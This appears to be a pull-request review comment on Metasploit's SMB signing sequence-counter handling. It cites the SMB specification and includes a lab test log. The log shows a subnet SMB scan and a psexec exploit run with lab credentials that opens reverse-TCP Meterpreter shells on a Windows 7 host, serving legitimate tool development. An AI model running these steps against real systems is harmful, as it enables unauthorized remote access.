According to the SMB specification, the signing example shows that we should always increment the sequence counter when interacting with the server - regardless of having a session_key present just yet:
The client builds an SMB_COM_SESSION_SETUP_ANDX request SMB and sends it to the server.
...
At this stage, the SessionKey is not yet available.
...
After the packet is sent by the client, the sequence number is incremented to 1, which is the expected sequence number for the response packet from the server.
LGTM, tested with psexec and smb_login from Metasploit.
Testing Output
```
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.159.1:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:required) (guid:{9cf46501-404c-4fd9-9708-aa9b1616c591}) (authentication domain:TOR)
[*] 192.168.159.11:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:9m 18s) (guid:{dffa5c50-e93d-4753-a4fc-0c698706f4db}) (authentication domain:WIN-9NSI4A6AIHJ)
[+] 192.168.159.11:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN-9NSI4A6AIHJ) (workgroup:WORKGROUP)
[*] 192.168.159.0/24: - Scanned 26 of 256 hosts (10% complete)
[*] 192.168.159.0/24: - Scanned 52 of 256 hosts (20% complete)
[*] 192.168.159.0/24: - Scanned 77 of 256 hosts (30% complete)
[*] 192.168.159.96:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:required) (guid:{696d9eef-5586-401c-accb-133d43cb333e}) (authentication domain:MSFLAB)
^C[*] 192.168.159.0/24: - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/psexec
show o [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf6 exploit(windows/smb/psexec) > set SMBUser smcintyre
SMBUser => smcintyre
msf6 exploit(windows/smb/psexec) > set SMBPass Password1!
SMBPass => Password1!
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] 192.168.159.11:445 - Connecting to the server...
[*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'...
[*] 192.168.159.11:445 - Selecting PowerShell target
[*] 192.168.159.11:445 - Executing the payload...
[+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:63414) at 2022-06-15 09:58:26 -0400
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.11 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(windows/smb/psexec) > set SMB::ProtocolVersion 1
SMB::ProtocolVersion => 1
msf6 exploit(windows/smb/psexec) > exploit
msf6 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] 192.168.159.11:445 - Connecting to the server...
[*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'...
[*] 192.168.159.11:445 - Selecting PowerShell target
[*] 192.168.159.11:445 - Executing the payload...
[+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:56247) at 2022-06-15 09:59:53 -0400
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.11 - Meterpreter session 2 closed. Reason: User exit
msf6 exploit(windows/smb/psexec) >
```
According to the SMB specification, the signing example shows that we should always increment the sequence counter when interacting with the server - regardless of having a session_key present just yet:
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/8b80e60b-7514-442b-baf4-eb785d0b0e2c